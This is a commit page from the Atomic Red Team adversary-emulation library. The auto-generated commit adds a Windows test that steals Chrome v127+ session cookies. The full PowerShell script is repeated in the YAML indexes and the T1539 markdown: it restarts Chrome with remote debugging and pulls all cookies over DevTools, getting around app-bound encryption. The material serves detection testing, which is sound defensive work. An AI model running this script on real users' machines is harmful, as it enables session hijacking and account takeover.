security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generated docs from job=generate-docs branch=master [ci skip]

Browse Source
This commit is contained in:
Atomic Red Team doc generator
2025-01-17 21:20:31 +00:00
parent 546946b08b
commit 16d170955c
12 changed files with 160 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+1 -1
View File
@@ -2,7 +2,7 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1702-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1703-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/index.csv
+1
View File
@@ -1533,6 +1533,7 @@ credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Con
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1533 credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
1534 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
1535 credential-access T1539 Steal Web Session Cookie 3 Steal Chrome Cookies via Remote Debugging (Mac) e43cfdaf-3fb8-4a45-8de0-7eee8741d072 bash
1536 credential-access T1539 Steal Web Session Cookie 4 Steal Chrome v127+ cookies via Remote Debugging (Windows) b647f4ee-88de-40ac-9419-f17fac9489a7 powershell
1537 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
1538 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
1539 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
atomics/Indexes/Indexes-CSV/windows-index.csv
+1
View File
@@ -1038,6 +1038,7 @@ credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using ke
credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Connection,0b207037-813c-4444-ac3f-b597cf280a67,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1038 credential-access T1003 OS Credential Dumping 7 Send NTLM Hash with RPC Test Connection 0b207037-813c-4444-ac3f-b597cf280a67 powershell
1039 credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
1040 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
1041 credential-access T1539 Steal Web Session Cookie 4 Steal Chrome v127+ cookies via Remote Debugging (Windows) b647f4ee-88de-40ac-9419-f17fac9489a7 powershell
1042 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
1043 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
1044 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
atomics/Indexes/Indexes-Markdown/index.md
+1
View File
@@ -2130,6 +2130,7 @@
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
- Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
atomics/Indexes/Indexes-Markdown/windows-index.md
+1
View File
@@ -1492,6 +1492,7 @@
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
- Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
- Atomic Test #2: Registry parse with pypykatz [windows]
atomics/Indexes/index.yaml
+44
View File
@@ -89888,6 +89888,50 @@ credential-access:
cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
name: bash
elevation_required: false
- name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
description: |-
Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
supported_platforms:
- windows
executor:
command: |-
$devToolsPort = 9222
$testUrl = "https://www.google.com"
stop-process -name "chrome" -force -erroraction silentlycontinue
$chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
Start-Sleep 10
$jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
$devToolsPages = ConvertFrom-Json $jsonResponse.Content
$ws_url = $devToolsPages[0].webSocketDebuggerUrl
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$uri = New-Object System.Uri($ws_url)
$ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
$GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
$buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
$segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
$ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
$completeMessage = New-Object System.Text.StringBuilder
do {
$receivedBuffer = New-Object byte[] 2048
$receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
$result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
$receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
$completeMessage.Append($receivedString)
} while (-not $result.EndOfMessage)
$ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
try {
$response = ConvertFrom-Json $completeMessage.ToString()
$cookies = $response.result.cookies
} catch {
Write-Host "Error parsing JSON data."
}
Write-Host $cookies
Stop-Process $chromeProcess -Force
name: powershell
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
atomics/Indexes/windows-index.yaml
+44
View File
@@ -74241,6 +74241,50 @@ credential-access:
'
name: powershell
elevation_required: false
- name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
description: |-
Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
supported_platforms:
- windows
executor:
command: |-
$devToolsPort = 9222
$testUrl = "https://www.google.com"
stop-process -name "chrome" -force -erroraction silentlycontinue
$chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
Start-Sleep 10
$jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
$devToolsPages = ConvertFrom-Json $jsonResponse.Content
$ws_url = $devToolsPages[0].webSocketDebuggerUrl
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$uri = New-Object System.Uri($ws_url)
$ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
$GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
$buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
$segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
$ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
$completeMessage = New-Object System.Text.StringBuilder
do {
$receivedBuffer = New-Object byte[] 2048
$receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
$result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
$receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
$completeMessage.Append($receivedString)
} while (-not $result.EndOfMessage)
$ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
try {
$response = ConvertFrom-Json $completeMessage.ToString()
$cookies = $response.result.cookies
} catch {
Write-Host "Error parsing JSON data."
}
Write-Host $cookies
Stop-Process $chromeProcess -Force
name: powershell
elevation_required: false
T1003.002:
technique:
modified: '2024-10-15T16:40:52.174Z'
atomics/T1539/T1539.md
+63
View File
@@ -18,6 +18,8 @@ After an adversary acquires a valid cookie, they can then perform a [Web Session
- [Atomic Test #3 - Steal Chrome Cookies via Remote Debugging (Mac)](#atomic-test-3---steal-chrome-cookies-via-remote-debugging-mac)
- [Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)](#atomic-test-4---steal-chrome-v127-cookies-via-remote-debugging-windows)
<br/>
@@ -198,4 +200,65 @@ go build
<br/>
<br/>
## Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)
Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
**Supported Platforms:** Windows
**auto_generated_guid:** b647f4ee-88de-40ac-9419-f17fac9489a7
#### Attack Commands: Run with `powershell`!
```powershell
$devToolsPort = 9222
$testUrl = "https://www.google.com"
stop-process -name "chrome" -force -erroraction silentlycontinue
$chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
Start-Sleep 10
$jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
$devToolsPages = ConvertFrom-Json $jsonResponse.Content
$ws_url = $devToolsPages[0].webSocketDebuggerUrl
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$uri = New-Object System.Uri($ws_url)
$ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
$GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
$buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
$segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
$ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
$completeMessage = New-Object System.Text.StringBuilder
do {
$receivedBuffer = New-Object byte[] 2048
$receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
$result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
$receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
$completeMessage.Append($receivedString)
} while (-not $result.EndOfMessage)
$ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
try {
$response = ConvertFrom-Json $completeMessage.ToString()
$cookies = $response.result.cookies
} catch {
Write-Host "Error parsing JSON data."
}
Write-Host $cookies
Stop-Process $chromeProcess -Force
```
<br/>
atomics/T1539/T1539.yaml
+1 -1
View File
@@ -116,7 +116,7 @@ atomic_tests:
name: bash
elevation_required: false
- name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
auto_generated_guid:
auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
description: |-
Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
atomics/used_guids.txt
+1
View File
@@ -1726,3 +1726,4 @@ de47f4a0-2acb-416d-9a6b-cee584a4c4d1
4758003d-db14-4959-9c0f-9e87558ac69e
1f23bfe8-36d4-49ce-903a-19a1e8c6631b
89a83c3e-0b39-4c80-99f5-c2aa084098bd
b647f4ee-88de-40ac-9419-f17fac9489a7